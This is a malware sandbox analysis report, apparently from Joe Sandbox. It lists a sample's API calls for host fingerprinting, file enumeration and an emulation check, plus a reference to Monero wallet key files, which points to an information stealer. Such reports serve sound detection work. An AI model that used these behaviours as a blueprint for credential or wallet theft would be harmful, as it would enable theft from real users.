                                      • Part of subcall function 001943F0: wsprintfA.USER32 ref: 0019440C
                                      • Part of subcall function 001943F0: FindFirstFileA.KERNEL32(?,?), ref: 00194423
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
                                      • Part of subcall function 001943F0: StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
                                      • Part of subcall function 001943F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
                                      • Part of subcall function 001943F0: FindClose.KERNEL32(000000FF), ref: 00194672
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: ceb6111721ed0f7ee5eb7dfef577234cb6b7efa563e430b3fe519b613054f3ad
                                    • Instruction ID: 42925a4eca7fb9f192d80579947cd597429f72680b58df87cd16793b48f7cc80
                                    • Opcode Fuzzy Hash: ceb6111721ed0f7ee5eb7dfef577234cb6b7efa563e430b3fe519b613054f3ad
                                    • Instruction Fuzzy Hash: B921DD7A91020467CB14F7B0EC46EDD373CAB66300F408555B54A93181EF745BC88FA1
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,013A89C0), ref: 001905DA
                                    • StrCmpCA.SHLWAPI(00000000,013A8940), ref: 001906A6
                                    • StrCmpCA.SHLWAPI(00000000,013A89B0), ref: 001907DD
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 80a13a71c45bc9e22266111a4323fabc3a00c5d3e99a377efb9304d238b5b139
                                    • Instruction ID: b8f1ccd9e53af0b8c4325388ba74c0c96ab859c2945ad81d33d1fdffaaa9008d
                                    • Opcode Fuzzy Hash: 80a13a71c45bc9e22266111a4323fabc3a00c5d3e99a377efb9304d238b5b139
                                    • Instruction Fuzzy Hash: 86913675A002489FCF18EF64D995EED7779BF95300F508529E80A9F251DB309B09CBD2
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,013A89C0), ref: 001905DA
                                    • StrCmpCA.SHLWAPI(00000000,013A8940), ref: 001906A6
                                    • StrCmpCA.SHLWAPI(00000000,013A89B0), ref: 001907DD
                                      • Part of subcall function 0019A170: lstrcpy.KERNEL32(?,00000000), ref: 0019A1B6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: ee9c0cd03adfa18f152a2660c8db874b3641fc07cbd2417c03ea48e1a39685ab
                                    • Instruction ID: dd6215eed73a0e9ba50a2cab9381244ad86ab8c7e450b8e25b5fe74562f813eb
                                    • Opcode Fuzzy Hash: ee9c0cd03adfa18f152a2660c8db874b3641fc07cbd2417c03ea48e1a39685ab
                                    • Instruction Fuzzy Hash: CA814575B002089FCF18EF64D991AEDB7B5FF95300F508529E80A9B251DB30AA09CBC2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: fef269757e9b2862cf0a95255c79156c1aa5d673ee1a25672f7047b8eca9ea22
                                    • Instruction ID: 9cd7f7e3da0e9d086cefb487e213ae242d2c6f89735275162bddbd765d9dd7f6
                                    • Opcode Fuzzy Hash: fef269757e9b2862cf0a95255c79156c1aa5d673ee1a25672f7047b8eca9ea22
                                    • Instruction Fuzzy Hash: B80181B1A04208EBCB05CF99DD45BAEBBBCFB09721F100619F905E3680D3745904CBA1
                                    APIs
                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C673095
                                      • Part of subcall function 6C6735A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6FF688,00001000), ref: 6C6735D5
                                      • Part of subcall function 6C6735A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6735E0
                                      • Part of subcall function 6C6735A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6735FD
                                      • Part of subcall function 6C6735A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C67363F
                                      • Part of subcall function 6C6735A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C67369F
                                      • Part of subcall function 6C6735A0: __aulldiv.LIBCMT ref: 6C6736E4
                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C67309F
                                      • Part of subcall function 6C695B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6956EE,?,00000001), ref: 6C695B85
                                      • Part of subcall function 6C695B50: EnterCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695B90
                                      • Part of subcall function 6C695B50: LeaveCriticalSection.KERNEL32(6C6FF688,?,?,?,6C6956EE,?,00000001), ref: 6C695BD8
                                      • Part of subcall function 6C695B50: GetTickCount64.KERNEL32 ref: 6C695BE4
                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6730BE
                                      • Part of subcall function 6C6730F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C673127
                                      • Part of subcall function 6C6730F0: __aulldiv.LIBCMT ref: 6C673140
                                      • Part of subcall function 6C6AAB2A: __onexit.LIBCMT ref: 6C6AAB30
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                    • String ID:
                                    • API String ID: 4291168024-0
                                    • Opcode ID: 9bf5118b5bc833820fdcb21c7401f766a6372751390e56b8e24ada445aa9b498
                                    • Instruction ID: 51df039d868ffe682c9ce56915deeffaff98179365ca50e83b886be4c8fe527a
                                    • Opcode Fuzzy Hash: 9bf5118b5bc833820fdcb21c7401f766a6372751390e56b8e24ada445aa9b498
                                    • Instruction Fuzzy Hash: A5F04922D2074892CB10DF75A8C11EA73B1AF6B114F001729E86453611FF2061D8C3DF
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00198F24
                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00198F45
                                    • CloseHandle.KERNEL32(00000000), ref: 00198F4F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                    • String ID:
                                    • API String ID: 3183270410-0
                                    • Opcode ID: 1ea5a612da45b3bb96f3fedc440f837c22e91707e352b4f2e17e811914332457
                                    • Instruction ID: 67a6f7bb610c7526fc8c43012b06f28bf156d7ef43035c8eb3ef69c6b2082614
                                    • Opcode Fuzzy Hash: 1ea5a612da45b3bb96f3fedc440f837c22e91707e352b4f2e17e811914332457
                                    • Instruction Fuzzy Hash: C7F0FE75A0420CFBDB15DFA4DD4AFED7778AB09700F104598BB1997290DBB0AE85CB90
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
                                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
                                    • ExitProcess.KERNEL32 ref: 00181143
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Process$AllocCurrentExitNumaVirtual
                                    • String ID:
                                    • API String ID: 1103761159-0
                                    • Opcode ID: e8d2c6553935eff1152f10d21939e6277cf91f3719a49a083878cfec1a8148b4
                                    • Instruction ID: e9126641a84a146a0111391efaba263cada80aaa26e83c748d5c97ae843ee54f
                                    • Opcode Fuzzy Hash: e8d2c6553935eff1152f10d21939e6277cf91f3719a49a083878cfec1a8148b4
                                    • Instruction Fuzzy Hash: F8E08C71A85308FBE710ABA0AC0EB497A6C9B05B02F204145F70ABA5C0C7B42A008B98
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                      • Part of subcall function 00196FA0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00196FE2
                                      • Part of subcall function 00196FA0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019701F
                                      • Part of subcall function 00196FA0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001970A3
                                      • Part of subcall function 00196FA0: RtlAllocateHeap.NTDLL(00000000), ref: 001970AA
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 00197130: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197144
                                      • Part of subcall function 00197130: RtlAllocateHeap.NTDLL(00000000), ref: 0019714B
                                      • Part of subcall function 00197260: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0019D5B0,000000FF,?,001917A9,00000000,?,013AD678,00000000,?), ref: 00197292
                                      • Part of subcall function 00197260: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0019D5B0,000000FF,?,001917A9,00000000,?,013AD678,00000000,?), ref: 00197299
                                      • Part of subcall function 001972F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197320
                                      • Part of subcall function 001972F0: RtlAllocateHeap.NTDLL(00000000), ref: 00197327
                                      • Part of subcall function 001972F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0019733F
                                      • Part of subcall function 00197380: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001973B0
                                      • Part of subcall function 00197380: RtlAllocateHeap.NTDLL(00000000), ref: 001973B7
                                      • Part of subcall function 00197380: GetComputerNameA.KERNEL32(?,00000104), ref: 001973CF
                                      • Part of subcall function 00197420: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DD0,00000000,?), ref: 00197450
                                      • Part of subcall function 00197420: RtlAllocateHeap.NTDLL(00000000), ref: 00197457
                                      • Part of subcall function 00197420: GetLocalTime.KERNEL32(?,?,?,?,?,001A0DD0,00000000,?), ref: 00197464
                                      • Part of subcall function 00197420: wsprintfA.USER32 ref: 00197493
                                      • Part of subcall function 001974D0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000), ref: 00197503
                                      • Part of subcall function 001974D0: RtlAllocateHeap.NTDLL(00000000), ref: 0019750A
                                      • Part of subcall function 001974D0: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000,?), ref: 0019751D
                                      • Part of subcall function 001975A0: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,013ADC70,00000000,?,001A0DE0,00000000,?,00000000,00000000), ref: 001975D5
                                      • Part of subcall function 00197630: GetKeyboardLayoutList.USER32(00000000,00000000,001A059F), ref: 00197681
                                      • Part of subcall function 00197630: LocalAlloc.KERNEL32(00000040,?), ref: 00197699
                                      • Part of subcall function 00197630: GetKeyboardLayoutList.USER32(?,00000000), ref: 001976AD
                                      • Part of subcall function 00197630: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00197702
                                      • Part of subcall function 00197630: LocalFree.KERNEL32(00000000), ref: 001977C2
                                      • Part of subcall function 00197820: GetSystemPowerStatus.KERNEL32(?), ref: 0019784D
                                    • GetCurrentProcessId.KERNEL32(00000000,?,013AD718,00000000,?,001A0DF4,00000000,?,00000000,00000000,?,013ADC40,00000000,?,001A0DF0,00000000), ref: 00191B8E
                                      • Part of subcall function 00198F10: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00198F24
                                      • Part of subcall function 00198F10: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00198F45
                                      • Part of subcall function 00198F10: CloseHandle.KERNEL32(00000000), ref: 00198F4F
                                      • Part of subcall function 001978A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001978D7
                                      • Part of subcall function 001978A0: RtlAllocateHeap.NTDLL(00000000), ref: 001978DE
                                      • Part of subcall function 001978A0: RegOpenKeyExA.KERNEL32(80000002,0139BD58,00000000,00020119,?), ref: 001978FE
                                      • Part of subcall function 001978A0: RegQueryValueExA.KERNEL32(?,013AD5B8,00000000,00000000,000000FF,000000FF), ref: 0019791F
                                      • Part of subcall function 001978A0: RegCloseKey.ADVAPI32(?), ref: 00197932
                                      • Part of subcall function 00197A00: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00197A69
                                      • Part of subcall function 00197A00: GetLastError.KERNEL32 ref: 00197A78
